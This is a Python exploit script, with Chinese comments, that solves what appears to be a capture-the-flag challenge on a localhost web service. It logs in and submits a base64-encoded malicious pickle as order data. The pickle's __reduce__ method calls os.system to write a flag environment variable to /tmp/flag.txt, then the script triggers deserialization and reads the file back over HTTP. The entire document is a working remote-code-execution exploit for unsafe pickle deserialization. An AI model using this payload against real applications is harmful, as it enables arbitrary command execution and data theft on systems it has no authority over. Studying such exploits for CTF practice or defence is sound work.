import pickle
import base64
import requests
import os
import time

url = "http://localhost:42550"

# Step 1: 登录
session = requests.Session()
login_response = session.post(f"{url}/login", data={'username': 'test', 'password': 'test'})
print("登录状态:", "成功" if session.cookies.get_dict() else "失败")

# Step 2: 创建恶意订单 - 这次将 flag 写入到应用可访问的位置
class RCE:
    def __reduce__(self):
        # 写入 flag 到 /tmp/flag.txt
        return (os.system, ('echo $DASFLAG > /tmp/flag.txt',))

payload = pickle.dumps(RCE())
order_data = base64.b64encode(payload).decode()
print(f"Payload 长度: {len(order_data)}")

response = session.post(f"{url}/create_order", data={'order_data': order_data})
print("创建订单响应:", response.text)

if response.status_code == 200:
    order_id = response.json()['order_id']
    print(f"订单ID: {order_id}")
    
    # Step 3: 触发反序列化
    time.sleep(1)
    view_response = session.get(f"{url}/view_order/{order_id}")
    print("查看订单状态码:", view_response.status_code)
    
    # Step 4: 通过 /static/ 路由读取 flag
    time.sleep(1)
    flag_response = session.get(f"{url}/static/flag.txt")
    print("Flag 内容:", flag_response.text.strip())
else:
    print("创建订单失败")